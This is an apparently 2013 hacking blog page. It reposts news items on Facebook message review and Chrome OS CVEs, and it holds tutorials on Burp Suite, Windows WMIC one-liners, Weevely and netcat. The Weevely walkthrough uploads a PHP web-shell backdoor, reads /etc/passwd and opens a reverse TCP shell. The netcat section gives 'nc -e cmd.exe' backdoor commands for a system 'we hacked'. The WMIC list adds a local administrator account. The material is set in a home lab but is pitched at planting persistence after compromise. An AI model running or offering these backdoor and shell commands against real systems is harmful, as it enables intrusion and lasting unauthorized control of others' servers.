Hacking

Hacking is an ART OF EXPLOITATION.

Nessus

One of Good Network Vulnerability Scanner.

Accunetix

Web Application Scanner.

BeEF

Do You Love BeEF, Its an Browser Based Exploitation Framework.

Wikileaks

WikiLeaks is an international, online, non-profit[2] organisation which publishes secret information, news leaks, and classified media from anonymous sources.

Thursday, April 18, 2013

How Strangers Can Read Your Private Facebook Messages



Here's something you probably didn't know: Facebook has a team of employees who read your private messages if they have been flagged by an automated tool. The tool searches for content that appears to violate their terms of service, namely malicious (infected) URLs or child pornography. It's imperfect, of course — that's where humans come in.

If a private message is flagged, actual people will jump in and read it. If there is something that could be illegal — particularly regarding child exploitation — those people contact law enforcement. The intent here is clear and defensible, yet the fact remains: All that stands between your "private" messages and the eyes of a stranger is the snap judgment of an algorithm.

"There are strong internal controls around the use of these tools to prevent misuse and abuse," Facebook told BuzzFeed, "and stringent guidelines for the way we cooperate with law enforcement."

It's not just Facebook. Dating site OkCupid has humans read private messages that have been flagged by its users.Twitter doesn't monitor direct messages either through automated tools or humans.

(Taken from BuzzFeed)

Wednesday, April 17, 2013

Creating Web Backdoor using Backtrack(Weevely Tutorial)

Weevely PHP stealth web shell and backdoor is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. It is an essential tool for web application post exploitation, and also can be used as stealth backdoor

Weevely is by defaultly available in OS like Backtrack, Backbox etc.

Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.

weevely is written in python.

Lets Start our Practical

Requirement:

1.Webserver for uploading the backdoor ( i installed dvwa on linux box)

2.Weevely PHP Shell(i.e, available in backtrack 5R3)

Steps to start

1.weevely is available in /pentest/backdoors/web/weevely/

Open terminal and type cd /pentest/backdoors/web/weevely/

2.Generate PHP stealth backdoor

./weevely.py generate security


When we execute this command a new file will be created called weevely.php

3.After generatig file the next step will be upload weevely.php file to webserver and we are uploading it to webserver.

I am using DVWA(Damn Vulnerable Web Application) for testing purpose



4.Now file has been successfully uploaded

5.Now access that weevely .php from terminal

./weevely.py

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security



Now we are in server

6.If we want to see files in that directory type ls



7.if we want to see passwords cat /etc/passwd


8.if we want to see who we are

whoami


9.using weevely for backdoor

here i am opening one more terminal and i am starting netcat

nc -lvp 1234

and in weevely terminal

:backdoor.reverse_tcp 192.168.142.132 1234



now we are connected

now you can access all server files.

thank you.

Tuesday, April 16, 2013

Google Fixes Three High-Risk Flaws in Chrome OS

Google has fixed a series of serious vulnerabilities in its Chrome OS, including three high-risk bugs that could be used for code execution on vulnerable machines. As part of its reward program, Google paid out more than $30,000 to a researcher who found three of the vulnerabilities.

All of the vulnerabilities that Google fixed in Chrome OS are in the O3D plugin, an API that enables developers to create 3D applications for the Web. Three of the vulnerabilities are high-risk and the other flaw is rated a medium severity bug.

Here are the vulnerabilities that Google fixed in Chrome OS 26:

[227197] Medium CVE-2013-2832: Uninitialized memory left in buffer in O3D plug-in.Credit to Ralf-Philipp Weinmann.

[227181] High CVE-2013-2833: Use-after-free in O3D plug-in. Credit to Ralf-Philipp Weinmann.

[227158] High CVE-2013-2834: Origin lock bypass of O3D and Google Talk plug-ins. Credit to Ralf-Philipp Weinmann.

[196456] High CVE-2013-2835: Origin lock bypass of O3D and Google Talk plug-ins. Credit to Google Chrome Security Team (Chris Evans).

Ralf-Philipp Weinmann, the researcher who discovered three of the flaws, received $31,336 in bug bounties for his work. That's at the highest end of the rewards that Google pays out in its Chromium reward program. Most of the rewards are in the $1,000-$3,000 range, with some going above that, depending upon the severity of the vulnerability and difficulty of exploitation.

"We’re pleased to reward Ralf-Philipp Weinmann $31,336 under the Chromium Vulnerability Rewards Program for a chain of three bugs, including demo exploit code and very detailed write-up. We are grateful to Ralf for his work to help keep our users safe," Ben Henry of the Chrome team said in a blog post.

(Taken from Threat Post)

Saturday, April 13, 2013

Burpsuite Tutorial





Burp Suite is an integrated platform for attacking web applications. It contains all of the Burp tools with numerous interfaces between them designed to facilitate and speed up the process of attacking an application. All tools share the same robust framework for handling HTTP requests, persistence, authentication, upstream proxies, logging, alerting and extensibility.

Burp Suite allows you to combine manual and automated techniques to enumerate, analyse, scan, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Link to Download: http://portswigger.net/burp/download.html

Burpsuite is available in free version and pro version

Requirements to run burpsuite

--The burpsuite is developed in Java so for burpsuite to run we require JRE, that is available freely on internet

--Burpsuite

Burpsuite free version is available in Backtrack and Kali also.

Burp acts as a web proxy, and allows you to intercept requests and responses, and then modify them before they’re sent along to the server or client. This is very handy stuff for attacking web applications.

The Burp Suite is made up of tools (descriptions take from the Port Swigger website):

Proxy: Burp Proxy is an interactive HTTP/S proxy server for attacking and testing web applications. It operates as a man-in-the-middle between the end browser and the target web server, and allows the user to intercept, inspect and modify the raw traffic passing in both directions.

Spider: Burp Spider is a tool for mapping web applications. It uses various intelligent techniques to generate a comprehensive inventory of an application’s content and functionality.

Scanner: Burp Scanner is a tool for performing automated discovery of security vulnerabilities in web applications. It is designed to be used by penetration testers, and to fit in closely with your existing techniques and methodologies for performing manual and semi-automated penetration tests of web applications.

Intruder: Burp Intruder is a tool for automating customised attacks against web applications.

Repeater: Burp Repeater is a tool for manually modifying and reissuing individual HTTP requests, and analysing their responses. It is best used in conjunction with the other Burp Suite tools. For example, you can send a request to Repeater from the target site map, from the Burp Proxy browsing history, or from the results of a Burp Intruder attack, and manually adjust the request to fine-tune an attack or probe for vulnerabilities.

Sequencer: Burp Sequencer is a tool for analysing the degree of randomness in an application’s session tokens or other items on whose unpredictability the application depends for its security.

Decoder: Burp Decoder is a simple tool for transforming encoded data into its canonical form, or for transforming raw data into various encoded and hashed forms. It is capable of intelligently recognising several encoding formats using heuristic techniques.

Comparer: Burp Comparer is a simple tool for performing a comparison (a visual “diff”) between any two items of data. In the context of attacking a web application, this requirement will typically arise when you want to quickly identify the differences between two application responses (for example, between two responses received in the course of a Burp Intruder attack, or between responses to a failed login using valid and invalid usernames), or between two application requests (for example, to identify the different request parameters that give rise to different behaviour).

One Liner commands for windows

Here i will be mostly working with WMIC.

what is WMIC ?

Windows management instrumentation command. The wmic command to me is one of the more powerful commands on windows. You can do multiple tasks with one command

List of running processes in brief

wmic process list brief

kill a process

wmic process where name="wordpad.exe" delete

Determine open shares

net share
wmic share list brief

Determine ip address

ipconfig

Get a new ip address

ipconfig /release
ipconfig /renew

Disk drive information

wmic diskdrive list full
wmic partition list full

List all patches

wmic qfe

List services

wmic service list brief

List user accounts

wmic useraccount list brief

List number of times a user logged on

wmic netlogin where (name like "%adm%") get numberoflogons

Reboot

shutdown /r /t 0

Shutdown

shutdown /s /t 0

Spawn a new command prompt

start cmd

Command line history

F7

Determine the current user

echo %USERNAME%

Determine who is apart of the administrators group

net localgroup administrators

Add a user where rocky is the username and password is redhat

net user rocky redhat /add

Add user rocky to administrators group

net localgroup administrators rocky /add

List user accounts

net user

List network connections and the programs that make connection

netstat -an

Display contents of file text.txt

type text.txt

Edit contents of file text.txt

edit text.txt

Determine PC name

hostname

Determine whether a system is 32 or 64 bit

wmic cpu get DataWidth /format:list

Startup applications

wmic startup get caption,command

Thursday, April 11, 2013

NETCAT Tutorial





Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Netcat  is the tcp/ip "Swiss Army knife".
Netcat is devloped not  for the back door purpose but unfortunately it is using for backdoor .
Net cat is a powerful tool ,it is a simple tool but can do many things 

It can be used as an 

Honeypot
Remote Administration
Chatting Purpose
Port Redirection
Sniffer
Creation of Backdoor
File Transfer and 
Banner Grabbing and many more.

I will be discussing some of the options

LAB:

Windows XP 192.168.142.128
Kali Linux      192.168.142.129

netcat is by default available in Linux Box

nc(netcat) as an Port Scanning Tool

Now i am Scanning XP machine by using nc

nc -v -w 2 -z

nc -v -w 2 -z 192.168.142.128


nc as an Banner Grabbing Tool

nc -v -n


Opening a port and using nc for chatting

nc -lvp 1234

l - listen
v - verbose
p - port number

i am trying to open a port number 1234

in XP Machine type command

nc -lvp 1234

in KALI linux type command

nc

nc 192.168.142.128 1234

and you can start chat


Transferring files using NETCAT

I am having one file in windows machine "hello.txt"

xp machine: nc -lvp 1234 < hello.txt

In Kali linux

I created a blank file "test.txt"

nc > test.txt

nc 192.168.142.128 1234 > test.txt



Netcat as an backdoor

Let us think we hacked a system and we want to create backdoor for remote administration purpose at that time netcat is very much useful

Upload netcat in remote system and run the following command now it will give command prompt to you

nc -L -p 1234 -d -e cmd.exe 

In XP machine : nc -lvp 1234 -e cmd.exe

in Kali : nc 192.168.142.128 1234

you will get command prompt



Thank you